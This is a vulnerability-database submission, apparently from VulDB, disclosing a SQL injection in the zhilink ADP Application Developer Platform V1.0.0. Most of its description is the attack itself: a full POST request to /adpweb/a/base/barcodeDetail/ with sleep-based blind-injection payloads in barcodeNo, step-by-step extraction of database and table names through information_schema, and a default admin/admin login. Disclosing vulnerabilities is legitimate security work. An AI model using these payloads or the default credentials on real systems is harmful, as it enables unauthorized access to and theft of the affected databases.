Submit #586697: zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 zhlink V1.0.0 SQL Injectioninfo

Titlezhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 zhlink V1.0.0 SQL Injection
Descriptionhttp://x.x.x.x:8083/adpweb/a/base/barcodeDetail/ 存在sql注入 数据包: POST /adpweb/a/base/barcodeDetail/ HTTP/1.1 Host: x.x.x.x:8083 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 150 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: zhilink.session.id=42141d9466524e3982434175479d0706; JSESSIONID=EEFF24767E83524537E66D81A353210D; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1733816177; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1733821639; HMACCOUNT=85856EEA2CB7DFFD; pageNo=1; pageSize=30 Origin: http://x.x.x.x:8083 Priority: u=4 Referer: http://x.x.x.x:8083/adpweb/a/base/barcodeDetail/ Sec-Gpc: 1 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip barcode=&barcodeNo='and(select*from(select+sleep(2))a/**/union/**/select+1)='&itemNo=&lotDateEnd=&lotDateStart=&pageNo=1&pageSize=30&sourceNo=&status= 注入点参数:barcodeNo、barcode、itemNo 使用默认口令admin/admin登录后手工延迟盲注 (1)延迟判断注入 (2)爆出数据库名 遍历出数据库名为:srm (3)表的长度 barcode=&barcodeNo='and+(select*from(select+if(length(substr((select+table_name+from+information_schema.tables+where+table_schema='srm'+limit+1,1),1))=6,sleep(3),1))e+union+select+1)#&itemNo=&lotDateEnd=&lotDateStart=&pageNo=1&pageSize=30&sourceNo=&status=v 上边可以得出第1个表的长度为16,对第一个表名进行爆破 数据包: barcode=&barcodeNo='and+(select*from(select+if(ascii(substr((select+table_name+from+information_schema.tables+where+table_schema='srm'+limit+0,1),1,1))=100,sleep(3),1))e+union+select+1)#&itemNo=&lotDateEnd=&lotDateStart=&pageNo=1&pageSize=30&sourceNo=&status= (4)对照ascii表查出表名为:db_backup_scheme,同理可跑出其他表的表名 (5)跑第一个字段的名称为id 继续跑数据,表db_backup_scheme有15个字段
Source⚠️ http://x.x.x.x:8082/adpweb/a/login
User
 Charlie Zha (UID 85915)
Submission05/29/2025 12:05 (10 months ago)
Moderation06/19/2025 08:06 (21 days later)
StatusAccepted
VulDB entry313271 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 barcodeDetail sql injection]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!